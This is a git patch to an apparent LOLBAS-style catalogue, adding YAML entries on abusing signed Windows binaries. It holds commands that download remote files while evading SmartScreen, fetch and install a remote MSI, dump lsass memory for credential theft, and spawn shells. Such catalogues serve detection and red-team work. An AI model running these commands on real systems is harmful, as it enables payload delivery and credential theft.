From 787c87470e87def61051fb1cff36566a43bf390e Mon Sep 17 00:00:00 2001 From: mrd0x Date: Fri, 31 Mar 2023 08:46:21 -0400 Subject: [PATCH] Several LOLBINs additions & modifications (#192) Co-authored-by: Wietze --- yml/OSBinaries/Explorer.yml | 4 +-- yml/OSBinaries/Msedge.yml | 29 +++++++++++++++++++ yml/OtherMSBinaries/Adplus.yml | 2 +- yml/OtherMSBinaries/Cdb.yml | 8 ++--- yml/OtherMSBinaries/Createdump.yml | 7 +++-- yml/OtherMSBinaries/Devinit.yml | 21 ++++++++++++++ yml/OtherMSBinaries/DumpMinitool.yml | 20 +++++++++++++ .../Microsoft.NodejsTools.PressAnyKey.yml | 21 ++++++++++++++ 8 files changed, 102 insertions(+), 10 deletions(-) create mode 100644 yml/OSBinaries/Msedge.yml create mode 100644 yml/OtherMSBinaries/Devinit.yml create mode 100644 yml/OtherMSBinaries/DumpMinitool.yml create mode 100644 yml/OtherMSBinaries/Microsoft.NodejsTools.PressAnyKey.yml diff --git a/yml/OSBinaries/Explorer.yml b/yml/OSBinaries/Explorer.yml index 0cac39e..d1e025c 100644 --- a/yml/OSBinaries/Explorer.yml +++ b/yml/OSBinaries/Explorer.yml @@ -1,7 +1,7 @@ --- Name: Explorer.exe Description: Binary used for managing files and system components within Windows -Author: 'Jai Minton' +Author: Jai Minton Created: 2020-06-24 Commands: - Command: explorer.exe /root,"C:\Windows\System32\calc.exe" @@ -21,8 +21,6 @@ Commands: Full_Path: - Path: C:\Windows\explorer.exe - Path: C:\Windows\SysWOW64\explorer.exe -Code_Sample: - - Code: Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_explorer_break_proctree.yml - Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_explorer.yml diff --git a/yml/OSBinaries/Msedge.yml b/yml/OSBinaries/Msedge.yml new file mode 100644 index 0000000..4ec4118 --- /dev/null +++ b/yml/OSBinaries/Msedge.yml @@ -0,0 +1,29 @@ +--- +Name: Msedge.exe +Description: Microsoft Edge browser +Author: mr.d0x +Created: 2022-01-20 +Commands: + - Command: msedge.exe https://example.com/file.exe.txt + Description: Edge will launch and download the file. A harmless file extension (e.g. .txt, .zip) should be appended to avoid SmartScreen. + Usecase: Download file from the internet + Category: Download + Privileges: User + MitreID: T1105 + OperatingSystem: Windows 10, Windows 11 + - Command: msedge.exe --headless --enable-logging --disable-gpu --dump-dom "http://example.com/evil.b64.html" > out.b64 + Description: Edge will silently download the file. File extension should be .html and binaries should be encoded. + Usecase: Download file from the internet + Category: Download + Privileges: User + MitreID: T1105 + OperatingSystem: Windows 10, Windows 11 +Full_Path: + - Path: c:\Program Files\Microsoft\Edge\Application\msedge.exe + - Path: c:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe +Resources: + - Link: https://twitter.com/mrd0x/status/1478116126005641220 + - Link: https://twitter.com/mrd0x/status/1478234484881436672 +Acknowledgement: + - Person: mr.d0x + Handle: '@mrd0x' diff --git a/yml/OtherMSBinaries/Adplus.yml b/yml/OtherMSBinaries/Adplus.yml index fc3a135..006c8b4 100644 --- a/yml/OtherMSBinaries/Adplus.yml +++ b/yml/OtherMSBinaries/Adplus.yml @@ -41,7 +41,7 @@ Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/6199a703221a98ae6ad343c79c558da375203e4e/rules/windows/process_creation/proc_creation_win_lolbin_adplus.yml - IOC: As a Windows SDK binary, execution on a system may be suspicious Resources: - - Link: https://blog.thecybersecuritytutor.com/adplus-debugging-tool-lsass-dump/ + - Link: https://mrd0x.com/adplus-debugging-tool-lsass-dump/ - Link: https://twitter.com/nas_bench/status/1534916659676422152 - Link: https://twitter.com/nas_bench/status/1534915321856917506 Acknowledgement: diff --git a/yml/OtherMSBinaries/Cdb.yml b/yml/OtherMSBinaries/Cdb.yml index 8bfc5fd..c6b1e11 100644 --- a/yml/OtherMSBinaries/Cdb.yml +++ b/yml/OtherMSBinaries/Cdb.yml @@ -1,7 +1,7 @@ --- Name: Cdb.exe Description: Debugging tool included with Windows Debugging Tools. -Author: 'Oddvar Moe' +Author: Oddvar Moe Created: 2018-05-25 Commands: - Command: cdb.exe -cf x64_calc.wds -o notepad.exe @@ -12,8 +12,8 @@ Commands: MitreID: T1127 OperatingSystem: Windows - Command: | - cdb.exe -pd -pn - .shell + cdb.exe -pd -pn + .shell Description: Attaching to any process and executing shell commands. Usecase: Run a shell command under a trusted Microsoft signed binary Category: Execute @@ -41,7 +41,7 @@ Resources: - Link: http://www.exploit-monday.com/2016/08/windbg-cdb-shellcode-runner.html - Link: https://docs.microsoft.com/en-us/windows-hardware/drivers/debugger/cdb-command-line-options - Link: https://gist.github.com/mattifestation/94e2b0a9e3fe1ac0a433b5c3e6bd0bda - - Link: https://blog.thecybersecuritytutor.com/the-power-of-cdb-debugging-tool/ + - Link: https://mrd0x.com/the-power-of-cdb-debugging-tool/ - Link: https://twitter.com/nas_bench/status/1534957360032120833 Acknowledgement: - Person: Matt Graeber diff --git a/yml/OtherMSBinaries/Createdump.yml b/yml/OtherMSBinaries/Createdump.yml index c5eabca..e89ae89 100644 --- a/yml/OtherMSBinaries/Createdump.yml +++ b/yml/OtherMSBinaries/Createdump.yml @@ -1,8 +1,8 @@ --- Name: Createdump.exe Description: Microsoft .NET Runtime Crash Dump Generator (included in .NET Core) -Author: Daniel Santos -Created: 2022-08-05 +Author: mr.d0x, Daniel Santos +Created: 2022-01-20 Commands: - Command: createdump.exe -n -f dump.dmp [PID] Description: Dump process by PID and create a minidump file. If "-f dump.dmp" is not specified, the file is created as '%TEMP%\dump.%p.dmp' where %p is the PID of the target process. @@ -13,6 +13,9 @@ Commands: OperatingSystem: Windows 10, Windows 11 Full_Path: - Path: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\*\createdump.exe + - Path: C:\Program Files (x86)\dotnet\shared\Microsoft.NETCore.App\*\createdump.exe + - Path: C:\Program Files\Microsoft Visual Studio\*\Community\dotnet\runtime\shared\Microsoft.NETCore.App\6.0.0\createdump.exe + - Path: C:\Program Files (x86)\Microsoft Visual Studio\*\Community\dotnet\runtime\shared\Microsoft.NETCore.App\6.0.0\createdump.exe Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/19396788dbedc57249a46efed2bb1927abc376d4/rules/windows/process_creation/proc_creation_win_proc_dump_createdump.yml - Sigma: https://github.com/SigmaHQ/sigma/blob/19396788dbedc57249a46efed2bb1927abc376d4/rules/windows/process_creation/proc_creation_win_susp_renamed_createdump.yml diff --git a/yml/OtherMSBinaries/Devinit.yml b/yml/OtherMSBinaries/Devinit.yml new file mode 100644 index 0000000..6fe7783 --- /dev/null +++ b/yml/OtherMSBinaries/Devinit.yml @@ -0,0 +1,21 @@ +--- +Name: Devinit.exe +Description: Visual Studio 2019 tool +Author: mr.d0x +Created: 2022-01-20 +Commands: + - Command: devinit.exe run -t msi-install -i https://example.com/out.msi + Description: Downloads an MSI file to C:\Windows\Installer and then installs it. + Usecase: Executes code from a (remote) MSI file. + Category: Execute + Privileges: User + MitreID: T1218.007 + OperatingSystem: Windows 10, Windows 11 +Full_Path: + - Path: C:\Program Files\Microsoft Visual Studio\*\Community\Common7\Tools\devinit\devinit.exe + - Path: C:\Program Files (x86)\Microsoft Visual Studio\*\Community\Common7\Tools\devinit\devinit.exe +Resources: + - Link: https://twitter.com/mrd0x/status/1460815932402679809 +Acknowledgement: + - Person: mr.d0x + Handle: '@mrd0x' diff --git a/yml/OtherMSBinaries/DumpMinitool.yml b/yml/OtherMSBinaries/DumpMinitool.yml new file mode 100644 index 0000000..127972a --- /dev/null +++ b/yml/OtherMSBinaries/DumpMinitool.yml @@ -0,0 +1,20 @@ +--- +Name: DumpMinitool.exe +Description: Dump tool part Visual Studio 2022 +Author: mr.d0x +Created: 2022-01-20 +Commands: + - Command: DumpMinitool.exe --file c:\users\mr.d0x\dump.txt --processId 1132 --dumpType Full + Description: Creates a memory dump of the lsass process + Usecase: Create memory dump and parse it offline + Category: Dump + Privileges: Administrator + MitreID: T1003.001 + OperatingSystem: Windows 10, Windows 11 +Full_Path: + - Path: C:\Program Files\Microsoft Visual Studio\2022\Community\Common7\IDE\Extensions\TestPlatform\Extensions +Resources: + - Link: https://twitter.com/mrd0x/status/1511415432888131586 +Acknowledgement: + - Person: mr.d0x + Handle: '@mrd0x' diff --git a/yml/OtherMSBinaries/Microsoft.NodejsTools.PressAnyKey.yml b/yml/OtherMSBinaries/Microsoft.NodejsTools.PressAnyKey.yml new file mode 100644 index 0000000..896d921 --- /dev/null +++ b/yml/OtherMSBinaries/Microsoft.NodejsTools.PressAnyKey.yml @@ -0,0 +1,21 @@ +--- +Name: Microsoft.NodejsTools.PressAnyKey.exe +Description: Part of the NodeJS Visual Studio tools. +Author: mr.d0x +Created: 2022-01-20 +Commands: + - Command: Microsoft.NodejsTools.PressAnyKey.exe normal 1 cmd.exe + Description: Launch cmd.exe as a subprocess of Microsoft.NodejsTools.PressAnyKey.exe. + Usecase: Spawn a new process via Microsoft.NodejsTools.PressAnyKey.exe. + Category: Execute + Privileges: User + MitreID: T1127 + OperatingSystem: Windows +Full_Path: + - Path: C:\Program Files\Microsoft Visual Studio\*\Community\Common7\IDE\Extensions\Microsoft\NodeJsTools\NodeJsTools\Microsoft.NodejsTools.PressAnyKey.exe + - Path: C:\Program Files (x86)\Microsoft Visual Studio\*\Community\Common7\IDE\Extensions\Microsoft\NodeJsTools\NodeJsTools\Microsoft.NodejsTools.PressAnyKey.exe +Resources: + - Link: https://twitter.com/mrd0x/status/1463526834918854661 +Acknowledgement: + - Person: mr.d0x + Handle: '@mrd0x'